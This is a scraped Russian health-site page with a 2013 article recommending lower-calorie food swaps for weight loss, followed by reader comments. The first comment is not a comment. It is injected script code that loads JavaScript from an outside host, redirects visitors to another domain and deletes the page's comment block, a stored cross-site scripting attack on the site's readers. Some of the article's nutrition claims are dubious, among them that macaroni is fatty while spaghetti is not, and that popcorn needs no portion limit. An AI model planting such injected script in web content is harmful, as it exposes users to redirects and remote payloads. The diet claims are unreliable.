Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лучшие замены для похуден...  >>  Лучшие замены для похудения
 
Обратная связь
 

Лучшие замены для похудения

Размер шрифта
07 февраля 2013 00:00
Юрий Малышев
Здоровье инфо
Мария Мусихина
Здоровье инфо
  • google_analytics: false
  • Нравится

Не секрет, что можно худеть, продолжая наслаждаться вкусной пищей. Просто надо правильно подойти к выбору еды: некоторые из «вредных» продуктов рекомендуется заменить на их аналоги с похожими вкусовыми качествами, но с меньшим содержанием жиров.

лучшие замены для похудения

Главный принцип худеющих – питаться часто, но небольшими порциями. В день должно быть 4-5 приемов пищи: завтрак, обед, полдник, ужин, между ними допустимы перекусы низкокалорийными продуктами. Давайте посмотрим, какие продукты питания необходимо заменить на правильные в каждый из приемов пищи, если вы нацелены сбросить лишнее.

Завтрак

Гранола – это злаки с сухофруктами, медом, орехами, запеченные до хрустящего состояния и спрессованные в батончики. В ритме современного города такая еда становится особенно популярна, однако следует помнить о ее высокой калорийности. При возможности заменяйте злаковые батончики другими, тоже богатыми клетчаткой, но менее калорийными продуктами – хлебом с отрубями, мюслями, фруктами.

Все сокосодержащие напитки необходимо заменить на натуральные фруктовые и овощные соки, которые богаты витаминами, минералами и антиоксидантами. Это практически то же самое, что съесть целый фрукт или овощ. А в так называемых сокосодержащих напитках, как правило, много сахара и калорий.

Обед

На гарнир выбирайте спагетти вместо макарон. Обычные макароны изготавливают из хлебопекарной муки высшего или первого сорта с добавлением яиц. В макаронах много жира и калорий, поэтому их употребление следует ограничить. А спагетти готовят из твердых сортов пшеницы, в которой высоко содержание клетчатки и питательных веществ. Спагетти с томатной пастой станут отличной альтернативой обычным макаронам с сыром.

Замените пиццу с колбасой, мясом, беконом пиццей с сыром, грибами или овощами. Если все же хочется съесть мясную пиццу, выбирайте в качестве начинки курицу или индейку. На обед ограничьтесь двумя кусками пиццы и овощным салатом.

Полдник

Ешьте сорбет вместо мороженого. В собрете или замороженном йогурте гораздо меньше жира и калорий, чем в мороженом. А благодаря специальной технологии приготовления вкус у них такой же, как у мороженого! Если захочется все же съесть мороженое, выбирайте его низкокалорийные виды.

Ужин

На ужин чаще всего мы покупаем какие-то полуфабрикаты, которые можно быстро приготовить. Выбирайте готовые замороженные продукты с низким уровнем жира и высоким содержанием белка и клетчатки: мясо птицы, овощи, рис, гречка. Отдайте предпочтение готовым замороженным продуктам, приготовленным на пару или гриле, и избегайте тех, которые были обжарены на масле.

Не покупайте готовые рыбные палочки, которые продают в магазинах в замороженном виде. По составу это рыбный фарш, смешанный с крахмалом и панированный в сухарях, с не всегда полезными пищевыми добавками. Креветки – вкусная и здоровая альтернатива рыбным палочкам. Они содержат мало калорий, богаты кальцием и белком.

Также откажитесь от покупных соусов и перейдите на соусы собственного приготовления. В отличие от покупных, в них нет никаких консервантов и других вредных веществ. Отличное блюдо – хумус, он используется как в качестве соуса, так и полноценной закуски. Его готовят из нутового пюре с добавлением оливкового масла, чеснока, паприки, сока лимона. Хумус – источник железа, витамина С, белков и клетчатки.

Перекусы

Если вечером вы собираетесь дома посмотреть фильм с друзьями, не стоит закупаться пачками чипсов, лучше возьмите попкорн. В чипсах много жира, а вот попкорн – здоровая закуска. Он нежирный, вкусный, хрустящий, к тому же является источником клетчатки. Для приготовления чипсов используется много масла, а для попкорна оно практически не требуется. Так что можете смело наслаждаться попкорном, не ограничивая себя в размере порций.

Похудеть не так сложно, как кажется! Просто следуйте нашим рекомендациям, ведите активный образ жизни и поменьше нервничайте.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - hadertis

26 февраля 2016 в 00:20

Цитировать   |   Пожаловаться

Cпасибо! Очень полезная статья! Не думала, что попкорн такой низкокалорийный.

Статьи

       
10 самых полезных продуктов   Защитят ли антиоксиданты от болезни?   Этот продукт спасет от слепоты   Что случится через час после гамбургера  
01 августа 2012Вы рискуете, используя обезжиренные соусы 09 января 2013Всего одно яблоко в день защитит от атеросклероза
 
05 сентября 2012Попкорн, который мы едим в кино, вызывает слабоумие! 20 января 2012Первому попкорну почти 7 тысяч лет
 

Слайдшоу

1
Самая низкокалорийная еда 8 продуктов для красивой и молодой кожи
Что съесть, когда не спится Еда, защищающая вас от солнца
Какая еда полезнее в сваренном виде Еда, которая не даст вам лопнуть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.